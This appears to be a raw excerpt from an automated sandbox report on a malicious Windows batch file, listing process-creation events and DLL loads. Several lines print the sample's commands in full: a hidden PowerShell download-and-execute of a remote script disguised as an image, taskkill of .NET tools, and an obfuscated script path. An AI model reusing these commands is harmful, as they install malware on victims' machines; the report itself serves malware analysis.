                      Source: taskkill.exe, 00000009.00000003.1569346683.000001E5A3019000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000009.00000003.1569577646.000001E5A3019000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")T;.CMDA
                      Source: taskkill.exe, 00000009.00000002.1570148616.000001E5A3019000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")T;.CMD
                      Source: taskkill.exe, 00000005.00000003.1560984895.000002167F7EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe")es;C:\Prog;
                      Source: taskkill.exe, 00000005.00000003.1561090941.000002167F7EA000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000005.00000002.1561439790.000002167F7EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe")es;C:\Prog
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
